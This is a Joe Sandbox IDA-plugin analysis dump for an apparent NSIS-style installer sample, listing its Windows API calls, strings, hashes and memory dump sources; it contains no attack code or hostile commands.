                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_c7WJL1gt32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: FileFindFirst
                                                                                                          • String ID:
                                                                                                          • API String ID: 1974802433-0
                                                                                                          • Opcode ID: 6fd2962910cdf18594a7907c322fc030c9e7a26b232b9d9b5d327205302d7dac
                                                                                                          • Instruction ID: e6f127318fd58302517648c6e406f49d0db104963aa8d987e753e5cb7f87edca
                                                                                                          • Opcode Fuzzy Hash: 6fd2962910cdf18594a7907c322fc030c9e7a26b232b9d9b5d327205302d7dac
                                                                                                          • Instruction Fuzzy Hash: EDF08271A14104EBDB10DBA4DA499AEB378EF14314F60467BF545F21E0DBB45D809B2A
                                                                                                          APIs
                                                                                                          • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 004045BC
                                                                                                          • GetDlgItem.USER32(?,000003E8), ref: 004045D0
                                                                                                          • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 004045ED
                                                                                                          • GetSysColor.USER32(?), ref: 004045FE
                                                                                                          • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 0040460C
                                                                                                          • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 0040461A
                                                                                                          • lstrlenW.KERNEL32(?), ref: 0040461F
                                                                                                          • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 0040462C
                                                                                                          • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 00404641
                                                                                                          • GetDlgItem.USER32(?,0000040A), ref: 0040469A
                                                                                                          • SendMessageW.USER32(00000000), ref: 004046A1
                                                                                                          • GetDlgItem.USER32(?,000003E8), ref: 004046CC
                                                                                                          • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 0040470F
                                                                                                          • LoadCursorW.USER32(00000000,00007F02), ref: 0040471D
                                                                                                          • SetCursor.USER32(00000000), ref: 00404720
                                                                                                          • LoadCursorW.USER32(00000000,00007F00), ref: 00404739
                                                                                                          • SetCursor.USER32(00000000), ref: 0040473C
                                                                                                          • SendMessageW.USER32(00000111,00000001,00000000), ref: 0040476B
                                                                                                          • SendMessageW.USER32(?,00000000,00000000), ref: 0040477D
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2417203909.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2417189556.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2417218395.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2417231352.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2417231352.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2417231352.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2417231352.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2417297454.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_c7WJL1gt32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
                                                                                                          • String ID: Call$N
                                                                                                          • API String ID: 3103080414-3438112850
                                                                                                          • Opcode ID: c2d943e7d3074a80d89972f065d7b0d6c6867904808fb573d17a53c74c23d30b
                                                                                                          • Instruction ID: 26ae409e5f73424340e4bb55f347a499eb46e427c8d4328441e026d38e95c6c2
                                                                                                          • Opcode Fuzzy Hash: c2d943e7d3074a80d89972f065d7b0d6c6867904808fb573d17a53c74c23d30b
                                                                                                          • Instruction Fuzzy Hash: 4B6173B1900209BFDB109F60DD85EAA7B69FB84314F00853AFB05772E0D7789D52CB58
                                                                                                          APIs
                                                                                                          • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                                                                          • BeginPaint.USER32(?,?), ref: 00401047
                                                                                                          • GetClientRect.USER32(?,?), ref: 0040105B
                                                                                                          • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                                                                          • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                                                                          • DeleteObject.GDI32(?), ref: 004010ED
                                                                                                          • CreateFontIndirectW.GDI32(?), ref: 00401105
                                                                                                          • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                                                                          • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                                                                          • SelectObject.GDI32(00000000,?), ref: 00401140
                                                                                                          • DrawTextW.USER32(00000000,00429240,000000FF,00000010,00000820), ref: 00401156
                                                                                                          • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                                                                          • DeleteObject.GDI32(?), ref: 00401165
                                                                                                          • EndPaint.USER32(?,?), ref: 0040116E
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2417203909.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2417189556.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2417218395.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2417231352.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2417231352.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2417231352.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2417231352.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2417297454.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_c7WJL1gt32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                                                          • String ID: F
                                                                                                          • API String ID: 941294808-1304234792
                                                                                                          • Opcode ID: a62f14d8607f0cab4b909ce482175ba86ddefa50def87cd09a38214d4056f576
                                                                                                          • Instruction ID: b35030fe9107d9a8359b932f7918d2348922827c9ca57aaae851fe5b21190c6b
                                                                                                          • Opcode Fuzzy Hash: a62f14d8607f0cab4b909ce482175ba86ddefa50def87cd09a38214d4056f576
                                                                                                          • Instruction Fuzzy Hash: 92418A71800249AFCF058FA5DE459AFBBB9FF44310F00842AF991AA1A0C738E955DFA4
                                                                                                          APIs
                                                                                                          • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,?,004061CF,?,?), ref: 0040606F
                                                                                                          • GetShortPathNameW.KERNEL32(?,00426DC8,00000400), ref: 00406078
                                                                                                            • Part of subcall function 00405E43: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00406128,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E53
                                                                                                            • Part of subcall function 00405E43: lstrlenA.KERNEL32(00000000,?,00000000,00406128,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E85
                                                                                                          • GetShortPathNameW.KERNEL32(?,004275C8,00000400), ref: 00406095
                                                                                                          • wsprintfA.USER32 ref: 004060B3
                                                                                                          • GetFileSize.KERNEL32(00000000,00000000,004275C8,C0000000,?,004275C8,?,?,?,?,?), ref: 004060EE
                                                                                                          • GlobalAlloc.KERNEL32(?,0000000A,?,?,?,?), ref: 004060FD
                                                                                                          • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00406135
                                                                                                          • SetFilePointer.KERNEL32(0040A590,00000000,00000000,00000000,00000000,004269C8,00000000,-0000000A,0040A590,00000000,[Rename],00000000,00000000,00000000), ref: 0040618B
                                                                                                          • GlobalFree.KERNEL32(00000000), ref: 0040619C
                                                                                                          • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 004061A3
                                                                                                            • Part of subcall function 00405EDE: GetFileAttributesW.KERNELBASE(00000003,00402F73,C:\Users\user\Desktop\c7WJL1gt32.exe,80000000,00000003), ref: 00405EE2
                                                                                                            • Part of subcall function 00405EDE: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405F04
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2417203909.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2417189556.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2417218395.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2417231352.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2417231352.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2417231352.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2417231352.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2417297454.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_c7WJL1gt32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                                                                                                          • String ID: %ls=%ls$[Rename]
                                                                                                          • API String ID: 2171350718-461813615
                                                                                                          • Opcode ID: a8f6130d4aa3065939d725957225dfc1b425243e5004b20d0867480790577512
                                                                                                          • Instruction ID: 8c4bc4cab4d3408e43c29de3b383fd3cef376d344e04ab2aaf2f470794b42cbb
                                                                                                          • Opcode Fuzzy Hash: a8f6130d4aa3065939d725957225dfc1b425243e5004b20d0867480790577512
                                                                                                          • Instruction Fuzzy Hash: 34313770200719BFD2206B619D48F6B3A6CEF45704F16043EFA46FA2D3DA3C99158ABD
                                                                                                          APIs
                                                                                                          • GetWindowLongW.USER32(?,000000EB), ref: 004043E3
                                                                                                          • GetSysColor.USER32(00000000), ref: 00404421
                                                                                                          • SetTextColor.GDI32(?,00000000), ref: 0040442D
                                                                                                          • SetBkMode.GDI32(?,?), ref: 00404439
                                                                                                          • GetSysColor.USER32(?), ref: 0040444C
                                                                                                          • SetBkColor.GDI32(?,?), ref: 0040445C
                                                                                                          • DeleteObject.GDI32(?), ref: 00404476
                                                                                                          • CreateBrushIndirect.GDI32(?), ref: 00404480
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2417203909.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2417189556.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2417218395.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2417231352.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2417231352.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2417231352.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2417231352.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2417297454.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_c7WJL1gt32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                                                          • String ID:
                                                                                                          • API String ID: 2320649405-0
                                                                                                          • Opcode ID: cedac81959eb3ef19a74f908d68e4e703a61b794166ebd5b231b869c6a402091
                                                                                                          • Instruction ID: 4d8d1a64c5805e8a020b3744e793f2033a9a6b6b0a681029562fed9dd316a9da
                                                                                                          • Opcode Fuzzy Hash: cedac81959eb3ef19a74f908d68e4e703a61b794166ebd5b231b869c6a402091
                                                                                                          • Instruction Fuzzy Hash: 722131715007049BCB319F68D948B5BBBF8AF81714B148A2EEE96E26E0D738D944CB54
                                                                                                          APIs
                                                                                                          • lstrlenW.KERNEL32(00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402F08,00000000,?), ref: 00405488
                                                                                                          • lstrlenW.KERNEL32(00402F08,00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402F08,00000000), ref: 00405498
                                                                                                          • lstrcatW.KERNEL32(00422708,00402F08,00402F08,00422708,00000000,00000000,00000000), ref: 004054AB
                                                                                                          • SetWindowTextW.USER32(00422708,00422708), ref: 004054BD
                                                                                                          • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004054E3
                                                                                                          • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004054FD
                                                                                                          • SendMessageW.USER32(?,00001013,?,00000000), ref: 0040550B
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2417203909.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2417189556.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2417218395.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2417231352.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2417231352.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2417231352.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2417231352.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2417297454.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_c7WJL1gt32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                                                                          • String ID:
                                                                                                          • API String ID: 2531174081-0
                                                                                                          • Opcode ID: d8bd542d8f5d0add287beae510a16995646733a1dc03fc5179ed0d48c47eb8dc
                                                                                                          • Instruction ID: e73fa1987b6059f35b704de59c80f6892b54c3d1ee51518932a2041d94d0b0cb
                                                                                                          • Opcode Fuzzy Hash: d8bd542d8f5d0add287beae510a16995646733a1dc03fc5179ed0d48c47eb8dc
                                                                                                          • Instruction Fuzzy Hash: BE21A171900558BACB119F95DD84ACFBFB5EF84314F10803AF904B22A1C3798A91CFA8
                                                                                                          APIs
                                                                                                          • CharNextW.USER32(?,*?|<>/":,00000000,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00435000,00403480,C:\Users\user\AppData\Local\Temp\,74DF3420,004036EF,?,00000006,?,0000000A), ref: 004066DF
                                                                                                          • CharNextW.USER32(?,?,?,00000000,?,00000006,?,0000000A), ref: 004066EE
                                                                                                          • CharNextW.USER32(?,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00435000,00403480,C:\Users\user\AppData\Local\Temp\,74DF3420,004036EF,?,00000006,?,0000000A), ref: 004066F3
                                                                                                          • CharPrevW.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00435000,00403480,C:\Users\user\AppData\Local\Temp\,74DF3420,004036EF,?,00000006,?,0000000A), ref: 00406706
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2417203909.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2417189556.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2417218395.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2417231352.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2417231352.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2417231352.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2417231352.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2417297454.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_c7WJL1gt32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Char$Next$Prev
                                                                                                          • String ID: *?|<>/":$C:\Users\user\AppData\Local\Temp\
                                                                                                          • API String ID: 589700163-4010320282
                                                                                                          • Opcode ID: 6f1dc59467bf7cdf849013f1baa50d92fe1cb62039c7f0915d7e3466f5f67e46
                                                                                                          • Instruction ID: ccb021e8c97aa0e4e9f296cc8cc4b0d2e06c32826977e33acd3911ee1a404cd3
                                                                                                          • Opcode Fuzzy Hash: 6f1dc59467bf7cdf849013f1baa50d92fe1cb62039c7f0915d7e3466f5f67e46
                                                                                                          • Instruction Fuzzy Hash: E011C82580061295DB302B548C44B77A2E8EF55764F52843FE985B32C1EB7D5CE28ABD
                                                                                                          APIs
                                                                                                          • DestroyWindow.USER32(00000000,00000000), ref: 00402EA9
                                                                                                          • GetTickCount.KERNEL32 ref: 00402EC7
                                                                                                          • wsprintfW.USER32 ref: 00402EF5
                                                                                                            • Part of subcall function 00405450: lstrlenW.KERNEL32(00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402F08,00000000,?), ref: 00405488
                                                                                                            • Part of subcall function 00405450: lstrlenW.KERNEL32(00402F08,00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402F08,00000000), ref: 00405498
                                                                                                            • Part of subcall function 00405450: lstrcatW.KERNEL32(00422708,00402F08,00402F08,00422708,00000000,00000000,00000000), ref: 004054AB
                                                                                                            • Part of subcall function 00405450: SetWindowTextW.USER32(00422708,00422708), ref: 004054BD
                                                                                                            • Part of subcall function 00405450: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004054E3
                                                                                                            • Part of subcall function 00405450: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004054FD
                                                                                                            • Part of subcall function 00405450: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040550B
                                                                                                          • CreateDialogParamW.USER32(0000006F,00000000,00402DF3,00000000), ref: 00402F19
                                                                                                          • ShowWindow.USER32(00000000,00000005), ref: 00402F27
                                                                                                            • Part of subcall function 00402E72: MulDiv.KERNEL32(0001E32B,?,0001E2CB), ref: 00402E87
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2417203909.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2417189556.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2417218395.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2417231352.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2417231352.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2417231352.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2417231352.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2417297454.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_c7WJL1gt32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: MessageSendWindow$lstrlen$CountCreateDestroyDialogParamShowTextTicklstrcatwsprintf
                                                                                                          • String ID: ... %d%%
                                                                                                          • API String ID: 722711167-2449383134
                                                                                                          • Opcode ID: c40ddff33436de44b244b2b19f9e8da7546f4e0328de08243a0837e5050f2c6b
                                                                                                          • Instruction ID: c65c9f61eb329069142d3a49436c3393aeffd9891ae55f37d91fa0e4ac25720a
                                                                                                          • Opcode Fuzzy Hash: c40ddff33436de44b244b2b19f9e8da7546f4e0328de08243a0837e5050f2c6b
                                                                                                          • Instruction Fuzzy Hash: 1A016170941614EBC7226B60EE4DA9B7B68BB01745B50413FF841F12E0CAB84459DBEE
                                                                                                          APIs
                                                                                                          • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404D35
                                                                                                          • GetMessagePos.USER32 ref: 00404D3D
                                                                                                          • ScreenToClient.USER32(?,?), ref: 00404D57
                                                                                                          • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404D69
                                                                                                          • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404D8F
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2417203909.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2417189556.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2417218395.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2417231352.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2417231352.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2417231352.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2417231352.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2417297454.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_c7WJL1gt32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Message$Send$ClientScreen
                                                                                                          • String ID: f
                                                                                                          • API String ID: 41195575-1993550816
                                                                                                          • Opcode ID: e2d2d6aa42d138b4bf43a857dc2fb8cfa63f2fbdf5f441295addbf44c9bf4daa
                                                                                                          • Instruction ID: ac2b37e4453cd55ff3643614bd1240a9a451636028a825994647dd398b99f398
                                                                                                          • Opcode Fuzzy Hash: e2d2d6aa42d138b4bf43a857dc2fb8cfa63f2fbdf5f441295addbf44c9bf4daa
                                                                                                          • Instruction Fuzzy Hash: 23015E71940218BADB00DB94DD85FFEBBBCAF95711F10412BBA50F62D0D7B499018BA4
                                                                                                          APIs
                                                                                                          • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402E11
                                                                                                          • wsprintfW.USER32 ref: 00402E45
                                                                                                          • SetWindowTextW.USER32(?,?), ref: 00402E55
                                                                                                          • SetDlgItemTextW.USER32(?,00000406,?), ref: 00402E67
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2417203909.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2417189556.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2417218395.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2417231352.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2417231352.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2417231352.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2417231352.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2417297454.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_c7WJL1gt32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Text$ItemTimerWindowwsprintf
                                                                                                          • String ID: unpacking data: %d%%$verifying installer: %d%%
                                                                                                          • API String ID: 1451636040-1158693248
                                                                                                          • Opcode ID: a591fce2f88080881549ac7e7473da6278debd618655821d08f98b44133a3158
                                                                                                          • Instruction ID: 1bfa7b94c56a1c823be81e007cf4dd9dcc28a4463181553f30e61efe61dd31fb
                                                                                                          • Opcode Fuzzy Hash: a591fce2f88080881549ac7e7473da6278debd618655821d08f98b44133a3158
                                                                                                          • Instruction Fuzzy Hash: 30F0317064020CABDF206F60DD4ABEE3B69EB40319F00803AFA45B51D0DBB999598F99
                                                                                                          APIs
                                                                                                            • Part of subcall function 6CF1121B: GlobalAlloc.KERNEL32(?,?,6CF1123B,?,6CF112DF,00000019,6CF111BE,-000000A0), ref: 6CF11225
                                                                                                          • GlobalFree.KERNEL32(?), ref: 6CF12657
                                                                                                          • GlobalFree.KERNEL32(00000000), ref: 6CF1268C
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2464950937.000000006CF11000.00000020.00000001.01000000.00000004.sdmp, Offset: 6CF10000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2464871451.000000006CF10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2464976083.000000006CF14000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2465039264.000000006CF16000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_6cf10000_c7WJL1gt32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Global$Free$Alloc
                                                                                                          • String ID:
                                                                                                          • API String ID: 1780285237-0
                                                                                                          • Opcode ID: 712d9ce93889d1b9ab31c368d030df4e04c79859e2046e01467b906077a8faf8
                                                                                                          • Instruction ID: 16f43b732f30ca1442b8ef2d1c11c9c48656b679ee1db279ae8342b0d3074b43
                                                                                                          • Opcode Fuzzy Hash: 712d9ce93889d1b9ab31c368d030df4e04c79859e2046e01467b906077a8faf8
                                                                                                          • Instruction Fuzzy Hash: 9831DC32B1C142EFCB148FD5C8E9E2A7BB6FB973083154529F54183EA1CB329819CB21
                                                                                                          APIs
                                                                                                          • lstrlenW.KERNEL32(00423728,00423728,?,%u.%u%s%s,00000005,00000000,00000000,?,?,00000000,?,000000DF,00000000,00000400,?), ref: 00404CAD
                                                                                                          • wsprintfW.USER32 ref: 00404CB6
                                                                                                          • SetDlgItemTextW.USER32(?,00423728), ref: 00404CC9
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2417203909.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2417189556.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2417218395.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2417231352.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2417231352.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2417231352.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2417231352.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2417297454.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_c7WJL1gt32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ItemTextlstrlenwsprintf
                                                                                                          • String ID: %u.%u%s%s$(7B
                                                                                                          • API String ID: 3540041739-1320723960
                                                                                                          • Opcode ID: c06007edea0c83b5e0931fd45a2cd42dabd82a11b0b4461ae96ab8921206da46
                                                                                                          • Instruction ID: eedca0a42859d703ec1426aadcab00983e9769f6aa36ce56d5d2522b0312c54d
                                                                                                          • Opcode Fuzzy Hash: c06007edea0c83b5e0931fd45a2cd42dabd82a11b0b4461ae96ab8921206da46
                                                                                                          • Instruction Fuzzy Hash: A711D873A0412837EB00556DAC45EDE3298EB85374F254237FA26F31D1D9798C6282E8
                                                                                                          APIs
                                                                                                          • WideCharToMultiByte.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\nse90B2.tmp,000000FF,C:\Users\user\AppData\Local\Temp\nse90B2.tmp\System.dll,00000400,?,?,00000021), ref: 004025E8
